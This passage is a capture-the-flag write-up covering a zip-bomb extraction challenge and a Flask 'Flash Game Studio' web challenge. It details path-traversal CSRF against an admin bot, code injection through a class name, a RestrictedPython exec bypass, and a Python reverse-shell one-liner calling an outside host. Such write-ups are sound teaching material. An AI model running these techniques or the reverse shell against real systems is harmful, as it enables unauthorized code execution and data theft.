most other parts of the world at no cost and with almost no restrictions
whatsoever. You may copy it, give it away or re-use it under the terms
of the Project Gutenberg License included with this ebook or online
at www.gutenberg.org. If you are not located in the United States,
you will have to check the laws of the country where you are located
before using this eBook.

It’s reasonable to assume from here that each of the 42 files contains the text of at least one book, and that the flag is hidden somewhere in one of them. I could do what I did with the first file for all the rest of them - start the extraction, wait a second, copy the partial file, and then stop the extraction, but that process was rather tedious and I didn’t want to do it for 42 files. Instead, I wrote a script that did it for me

import zipfile
chunk_size=16
with zipfile.ZipFile("archive.zip", 'r') as zf:
    for i,info in enumerate(zf.infolist()):
        print(f"Scanning {info.filename!r} …")
        offset = 0
        dat = []
        with zf.open(info, 'r') as stream:
            while True:
                print("reading chunk")
                chunk = stream.read(chunk_size)
                print("read")
                if not chunk:
                    break
                idx = chunk.find(b'\x00')
                if idx != -1:
                    print(f"null byte at uncompressed offset {offset + idx}")
                    chunk = chunk[:idx]
                    break
                offset += len(chunk)
                dat.append(chunk)
        with open(f"extracted/{i}.txt", 'wb') as f:
            f.write(b''.join(dat))

This extracted every file from inside the zip archive, 16 (compressed) bytes at a time, and stops each whenever it finds a null byte. The expected plaintexts are all e-books, which it’s reasonable to expect wouldn’t contain a null byte normally. It took a while for this to run, because it still (somehow) took a hot second to decompress the up to 16 bytes of zip bomb. After a minute or two, I had a folder with the texts from 42 books in it. The obvious thing to do from here was to just grep for the flag format, which I tried and worked immediately.

grepping for the flag

I submitted UMASS{That script, it's got life in it. Working, it is. No doubt.} as the flag, and it was correct.

Flash Game Studio

The web category for this event was pretty solid overall. I solved all five of them and they were all interesting in their own right, but I found this one most unique and deserving of a writeup. The description reads

I created a really cool game editor for your browser, but I’m still working on it so you can only sign up for now.

and there were two attachments: chall.zip and CONNECTION-INSTRUCTIONS.txt.

The extracted handout contained two docker containers - a Flask app and a Postgres database

services: 
  app:
    ports:
      - 80:80
    volumes: 
      - ./uploads:/app/users
    build: app
    environment: 
      POSTGRES_PASSWORD: test
      APP_SECRET: test
      POSTGRES_HOST: db
    restart: always
  db:
    image: postgres
    environment: 
      POSTGRES_PASSWORD: test
    volumes:
      - ./db/init.sql:/docker-entrypoint-initdb.d/init.sql
    restart: always

The Dockerfile for the Flask app looked like this

FROM python:slim
RUN pip3 install flask[async] RestrictedPython psycopg2-binary selenium
RUN apt-get update
RUN apt-get install -y wget
RUN wget -q https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb 
RUN apt-get install -y ./google-chrome-stable_current_amd64.deb
WORKDIR /app
COPY app .
RUN chmod +x entrypoint.sh
ENTRYPOINT "/app/entrypoint.sh"

and the init.sql for the database contained the following:

CREATE DATABASE flashgamestudio;
\c flashgamestudio;

CREATE EXTENSION IF NOT EXISTS "uuid-ossp";

CREATE TABLE users (
    uid varchar(255)  UNIQUE NOT NULL,
    username varchar(255) PRIMARY KEY,
    password varchar(255) NOT NULL,
    user_desc text NOT NULL,
    role_id smallint NOT NULL
);

CREATE TABLE games (
    code text NOT NULL,
    game_name varchar(255) NOT NULL,
    game_desc varchar(255) NOT NULL,
    username varchar(255) REFERENCES users
);

INSERT INTO users VALUES(
    uuid_generate_v4(),
    'admin',
    'test',
    'i am the admin',
    3
);

INSERT INTO games VALUES(
    'UMASS{FLAG_FOR_TESTING}',
    'best game ever',
    'the best game ever',
    'admin'
);

Spinning up the application and visiting it in a browser, I was met with a standard login/register page. I made an account and signed in, and was greeted with this page

not a developer

I clicked on the link to request access to the early access dev program, and after a few seconds of loading saw a blank page with the content Admin visited your profile but probably denied you!. Okay, so this is an admin bot challenge, presumably with XSS. The next step was to check out our profile page and see what’s up

user profile

It shows us our username, description, ID, profile picture, and gives us an option to update our description. There’s no clear way to change our profile picture, which leaves two potential XSS targets - username and description. With the initial exploration out of the way, the next thing to do was to properly inspect the source code.

db.py seems to provide a class for simple database operations.

import psycopg2
import os
from server_helpers import ROLE_USER, ROLE_DEV

class DatabaseHelper:
    def __init__(self):
        self.conn = psycopg2.connect(database="flashgamestudio",
            host=os.environ["POSTGRES_HOST"],
            user="postgres",
            password=os.environ["POSTGRES_PASSWORD"])
    
    def reset_conn(self):
        del self.conn
        self.conn = psycopg2.connect(database="flashgamestudio",
            host=os.environ["POSTGRES_HOST"],
            user="postgres",
            password=os.environ["POSTGRES_PASSWORD"])
        
    def getUsers(self):
        cur = self.conn.cursor()
        cur.execute("SELECT * FROM users;")
        return cur.fetchall()
    
    def loginUser(self,username,password):
        cur = self.conn.cursor()
        cur.execute("SELECT username,role_id,uid FROM users WHERE username=%s AND password=%s",(username,password))
        user = cur.fetchone()
        cur.close()
        return user
    
    def promoteUser(self,uid):
        cur = self.conn.cursor()
        try:
            cur.execute("UPDATE users SET role_id=%s WHERE uid=%s;",(ROLE_DEV,uid))
            self.conn.commit()
            cur.close()
        except:
            self.reset_conn()

    def updateUserDesc(self,username,user_desc):
        cur = self.conn.cursor()
        try:
            cur.execute("UPDATE users SET user_desc=%s WHERE username=%s;",(user_desc,username))
            self.conn.commit()
            cur.close()
        except:
            self.reset_conn()

    def registerUser(self,username,password,user_desc):
        cur = self.conn.cursor()
        try:
            cur.execute("INSERT INTO USERS VALUES(uuid_generate_v4(),%s,%s,%s,%s);",(username,password,user_desc,ROLE_USER))
            self.conn.commit()
            cur.close()
        except:
            self.reset_conn()

    def getUser(self, username):
        cur = self.conn.cursor()
        cur.execute("SELECT username,user_desc,uid FROM users WHERE username=%s",(username,))
        user = cur.fetchone()
        cur.close()
        return user
    
    def getGames(self,username):
        cur = self.conn.cursor()
        cur.execute("SELECT game_name,game_desc,code FROM games WHERE username=%s",(username,))
        games = cur.fetchall()
        cur.close()
        return games
    
    def getGame(self,username,game_name):
        cur = self.conn.cursor()
        cur.execute("SELECT game_name,code FROM games WHERE username=%s AND game_name=%s",(username,game_name))
        game = cur.fetchone()
        cur.close()
        return game
    
    def createGame(self,game_name,game_code,game_desc,username):
        cur = self.conn.cursor()
        try:
            cur.execute("INSERT INTO games VALUES(%s,%s,%s,%s);",(game_code,game_name,game_desc,username))
            self.conn.commit()
            cur.close()
        except:
            self.reset_conn()

While I think it’s possible to make some operations fail with a race condition while the connection is resetting, it wouldn’t help us. Other than that, everything here seems secure. It’s properly using psycopg2’s prepared templates, so SQL injection is off the table. app.py shows us a handful of routes:

@app.route("/")
def index():
    return render_template('index.html')

@app.get("/login")
def login_get():
    return render_template('login.html')

@app.post("/login")
def login_post():
    username = request.form.get('username', None)
    password = request.form.get('password', None)
    if(type(username) == str and type(password) == str):
        result = database_helper.loginUser(username,password)
        if(result != None and result[0] == username):
            user, role, uid = result
            session['username'] = user
            session['role'] = role
            session['uid'] = uid
            return redirect("/dev")
        return redirect("/login?message=Error:+Incorrect+Username+or+Password!")
    return redirect("/login?message=Error:+Malformed+Username+or+Password!")

@app.get("/register")
def register_get():
    return render_template('register.html')

@app.post("/register")
def register_post():
    ...

@app.route('/logout')
def logout():
    session.pop('username', None)
    return redirect("/")

@app.get("/dev")
def dev_get():
    if('role' in session and 'username' in session):
        if(session['role'] == 2):
            games = database_helper.getGames(session['username'])
            return render_template('dev.html',games=games,username=session['username'])
        return render_template('dev.html',err="You are not a dev!",username=session['username'])
    return redirect("/login")

@app.get("/profile")
def profile_user_get():
    username = request.args.get('username',None)
    if('username' in session):
        if(username==None):
            return redirect(f'/profile?username={session["username"]}')
        if(session['username']==username or session['username']=='admin'):
            username,user_desc, uid = database_helper.getUser(username)
            return render_template('profile.html',username=username,user_desc=user_desc,uid=uid)
    return redirect("/login")

@app.post("/create_game")
def create_game():
    if('role' in session and session['role']==2):
        game_name = request.form.get('game_name', None)
        game_desc = request.form.get('game_desc', "")
        if(game_name==None):
            return "You must provide a game name",400
        code = FlashGameHelper.gen_game_from_template(game_name)
        database_helper.createGame(game_name,code,game_desc,session['username'])
        return redirect('/dev?message=Created+game+successfully!')
    return "You are not a dev!",403

@app.route("/request_access/<username>")
def request_access(username):
    visit_profile(username)
    return "Admin visited your profile but probably denied you!"

@app.route("/admit/<uid>")
def admit_user(uid):
    if('username' in session and 'role' in session):
        if(session['role'] == 3):
            database_helper.promoteUser(uid)
            return "Accepted.",200
        return "Only admin can accept people to the program.",403
    print("not authed")
    return "Unauthorized.",403

@app.route("/user/profile_pic/<username>")
def get_profile_pic(username):
    if('username' in session and session['username']==username):
        _, _, uid = database_helper.getUser(username)
        return send_from_directory('users', f'{uid}.jpg')
    return "Unauthorized.",403

@app.route("/game/<username>/<game_name>")
def get_dev_game(username,game_name):
    if('username' in session and session['username']==username):
        game_name, code = database_helper.getGame(username,game_name)
        return render_template("game.html",username=username,code=code,game_name=game_name)
    return "Unauthorized.",403

@app.route("/game/<username>/<game_name>/edit")
def edit_game(username,game_name):
    if('username' in session and session['username']==username):
        return "Editing is not supported right now.",501
    return "Unauthorized.",403

@app.route("/game/<username>/<game_name>/test")
def test_game(username,game_name):
    if('username' in session and session['username']==username):
        game_name, code = database_helper.getGame(username,game_name)
        return FlashGameHelper.test_game(code,game_name), 200
    return "Unauthorized.",403

@app.post("/profile/update")
def update_user():
    if('username' in session):
        user_desc = request.form.get('about_me', "")
        database_helper.updateUserDesc(session['username'],user_desc)
        return redirect("/profile")
    return "Unauthorized.",403

I truncated the register endpoint for brevity, but it does exactly what one would expect. It notably doesn’t let someone register a username that already exists. The admin bot in bot.py is also fairly straightforward:

def visit_profile(username):
    options = webdriver.ChromeOptions()
    options.add_argument("no-sandbox")
    options.add_argument("headless")
    options.add_argument("disable-gpu")
    driver = webdriver.Chrome(options=options)
    # Create admin flask session manually
    si = SecureCookieSessionInterface()
    app = MockApp()
    s = si.get_signing_serializer(app)
    ADMIN_COOKIE = s.dumps({'username':'admin','role':3})
    driver.get("http://localhost")
    driver.add_cookie({"name": "session", "value": ADMIN_COOKIE})
    driver.get(f"http://localhost/profile?username={username}")
    # Access requests via the `requests` attribute
    sleep(3)
    driver.close()

It visits our profile, that’s about it. One of the first things I checked was the jinja templates to see if anything was using |safe or something else that would make XSS obvious, and nothing was. The profile.html template contained the following:

{% extends 'base.html' %}

{% block header %}
{% endblock %}

{% block content %}
<div class="container">
    <h1>Hello {{username}}, your UID is {{uid}}</h1>
    <h2>About Me</h2>
    <p>
        {{user_desc}} 
    </p>
    <h3>My Portrait</h3>
    <img class="portrait" src="/user/profile_pic/{{username}}" height="150px"><br>

    <form class="game_form" id="profile_form" action="/profile/update" method="POST">
        <h3>Update Profile</h3>
        <label for="about_me">Update about me: </label><br>
        <textarea type="text" id="about_me" name="about_me" placeholder="Sample description"></textarea><br>
        <img  onclick="profile_form.submit()" onmouseout="this.src=`/static/profile_button.png`" onmouseover="this.src=`/static/profile_button_hover.png`" width="200px" src="/static/profile_button.png"><br>
    </form> 
</div>
{% endblock %}

and as per app.py, it gets rendered like this

@app.get("/profile")
def profile_user_get():
    username = request.args.get('username',None)
    if('username' in session):
        if(username==None):
            return redirect(f'/profile?username={session["username"]}')
        if(session['username']==username or session['username']=='admin'):
            username,user_desc, uid = database_helper.getUser(username)
            return render_template('profile.html',username=username,user_desc=user_desc,uid=uid)
    return redirect("/login")

There isn’t any XSS here, but there does seem to be a CSRF. It renders

<img class="portrait" src="/user/profile_pic/{{username}}" height="150px">

and the value of username isn’t sanitized at all, beyond verifying that it exists in the database (because the tuple unpack will throw an error if it isn’t). We can’t break out of the quote, but we can control what the source URL is relative to the site’s base URL. One other thing to note is that in several places, the Flask application uses app.route without specifying a method instead of the standard app.post for routes that can modify state. This is important because when the browser renders the <img>, it makes a GET request to the src in question. The clear target here is the /admit endpoint.

@app.route("/admit/<uid>")
def admit_user(uid):
    if('username' in session and 'role' in session):
        if(session['role'] == 3):
            print(f"promoted {uid}")
            database_helper.promoteUser(uid)
            return "Accepted.",200
        print("not promoted")
        return "Only admin can accept people to the program.",403
    print("not authed")
    return "Unauthorized.",403

If we can make the src attribute effectively direct to /admit/<our UID> we can promote our standard account to be a “developer” account. The way to do this is path traversal. If we can make username something like ../../admit/<uid>, when the browser requests /user/profile_pic/../../admit/<uid> it will get automatically reduced to admit/<uid>. There is a slight problem here in that the /request_access endpoint takes the target username as a path parameter, not a query string one.

Our account’s UID is 465364f1-ceed-45d1-b330-0029894e1149. We can make a second account with the username ../../admit/465364f1-ceed-45d1-b330-0029894e1149. The /request_access endpoint is unauthenticated, so we can make requests to it easily using cURL. If we make a request directly to http://localhost/request_access/../../admit/465364f1-ceed-45d1-b330-0029894e1149, Flask logs show us that the server saw this:

192.168.16.1 - - [23/Apr/2025 01:13:35] "GET /admit/465364f1-ceed-45d1-b330-0029894e1149 HTTP/1.1" 403

Clearly the ../ were parsed beforehand, and changed the request path. If I add --path-as-is to my cURL command, it shows this instead:

192.168.16.1 - - [23/Apr/2025 01:14:40] "GET /request_access/../../admit/465364f1-ceed-45d1-b330-0029894e1149 HTTP/1.1" 404 -

This is better, but still doesn’t work because the / in the URL are parsed as path delimiters, so it doesn’t match the route /request_access/<username>. It’s possible to resolve this issue by double URL-encoding the username. Werkzeug automatically decodes these, so it should give us the proper username still. Making a request to http://localhost/request_access/%252E%252E%252F%252E%252E%252Fadmit%252F465364f1%252Dceed%252D45d1%252Db330%252D0029894e1149 promotes our account exactly as expected.

Logging back into the now-developer account shows us the unlocked dev dashboard, which has a form for “creating a new game”. I made a game with a random name and description to see what would happen.

dev dashboard with one created game

Clicking on the link shows us another page with what looks to be some Python source code, and a link to “test” the game.

game details

It’s notable that if this code were to run, it would result in a loop that hangs forever. Clicking “test game” shows an otherwise blank page with the text Game failed during testing.. The FlashTemplater.py source file contains this code:

import ast
from RestrictedPython import compile_restricted
from base64 import b64encode, b64decode

GAME_TEMPLATE = """class GameName:
    def __init__(self):
        self.board = []
        self.gameover = False
        self.player1, self.player2, self.state = {},{},{'gameover':False}

    def play(self):
        while(True):
            self.player1, self.player2, self.state = self.tick()
            if(self.state['gameover']):
                break
        return "Your game works!"

    def tick(self):
        self.gameover = True
        return {},{},{'gameover':False}
"""

class FlashGameHelper:
    def gen_game_from_template(name):
        tree = ast.parse(GAME_TEMPLATE)
        tree.body[0].name = name
        return b64encode(ast.unparse(tree).encode()).decode()

    def test_game(code,game_name):
        try: 
            # Let's us declare classes in RestrictedPython
            exec_globals = globals().copy()

            exec_globals['__metaclass__'] = type
            exec_globals['__name__'] = "GameTemplate"
            # print(exec_globals)
            # Using this because it should safely create the class
            safe_byte_code = compile_restricted(
                b64decode(code).decode(),
                filename='<inline code>',
                mode='exec',
            )
            exec(safe_byte_code,globals=exec_globals)
            # Trying to run the game breaks, will learn how to implement
            # this properly later, security comes first!!!
            safe_byte_code = compile_restricted(
                f'{game_name}().play()',
                filename='<inline code>',
                mode='exec',
            )
            exec(safe_byte_code,exec_globals)
            return "Game ran successfully."
        except Exception:
            return f"Game failed during testing."

Adding some debug statements to this and trying it again, the error that gets caught is

  File "/app/FlashTemplater.py", line 51, in test_game
    exec(safe_byte_code,exec_globals)
    ~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<inline code>", line 1, in <module>
NameError: name '_getattr_' is not defined. Did you mean: 'getattr'?

It’s also worth mentioning that this code only works in python3.13 and up anyway, because exec(safe_byte_code,globals=exec_globals) is invalid in earlier versions due to globals not being a keyword arg. This tripped me up for a bit when testing outside of the container until I realized that. The fail in _getattr_ is presumably happening on the self.state['gameover'] line, and is probably a result of whatever RestrictedPython is doing. I ignored this for the time being, instead figuring out how to inject code in the first place. Despite the attempt to sanitize using the ast module, it’s really easy to inject code by making a username like this:

meow:
    pass
print(1)
class nope

Visiting the game details page for this game it’s clear that this does work, as the displayed source code looks like this:

class meow:
    pass
print(1)
class nope:

    def __init__(self):
        self.board = []
        self.gameover = False
        self.player1, self.player2, self.state = ({}, {}, {'gameover': False})

    def play(self):
        while True:
            self.player1, self.player2, self.state = self.tick()
            if self.state['gameover']:
                break
        return 'Your game works!'

    def tick(self):
        self.gameover = True
        return ({}, {}, {'gameover': False})

This code compiles fine, but when it gets executed the print line throws an error because NameError: name '_print_' is not defined. Did you mean: 'print'?. Again, this is due to RestrictedPython being used. At this point, the challenge is just a standard pyjail which is something I’m generally pretty good at. I checked out the docs for RestrictedPython, and saw that the normal way it’s used involves restricted builtins:

respy docs

The challenge, however, doesn’t do this. It gives us the entire globals dict, albeit a copy such that we can’t poison the namespace. Because all of the globals still exist, I was curious what would happen if I just tried to call exec(). I used exec("print(1)") as my payload, instead of just print(1). As I somewhat expected, this errored with the reason SyntaxError: ('Line 3: Exec calls are not allowed.',). I did a search in the RestrictedPython repo for this error, and found this:

if isinstance(node.func, ast.Name):
    if node.func.id == 'exec':
        self.error(node, 'Exec calls are not allowed.')
    elif node.func.id == 'eval':
        self.error(node, 'Eval calls are not allowed.')

So… it’s comparing the name of the function as a string? What happens if i just… rename the function? I changed my payload to

meow:
    pass
what = exec
what("print(1)")
class nope

and tried it again. This errored later on because of SyntaxError: ("Line 1: SyntaxError: invalid syntax at statement: 'meow:'",) at the second exec(), but it got through the first one which meant my code executed without an error, and most importantly a line containing 1 showed up in the Flask logs. With the pyjail escaped, the problem was basically solved. From here I just swapped out my benign payload for a proper reverse shell:

meow:
    pass
what = exec
what('import os,pty,socket;s=socket.socket();s.connect(("ce.ns.or.ed",1338));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")')
class nope

As expected I caught the reverse shell when this executed. My shell was inside the Flask container not the Postgres one so I couldn’t just cat the flag, but it was fairly simple to just open a Python interpreter with python3. I connected to the database the same way the app did and then just called the helper function to get the content of the admin’s game.

>>> from db import DatabaseHelper
>>> database_helper = DatabaseHelper()
>>> database_helper.getGames("admin")
[('best game ever', 'the best game ever', 'UMASS{FLAG_FOR_TESTING}')]

With my solution working locally, I referred to the instructions for spawning a remote instance and repeated it there. My solution worked, and the real flag was UMASS{CR0SS_th3_fl4sH_g4m3_t0_1nj3ct_Pyth0n!1!!11}.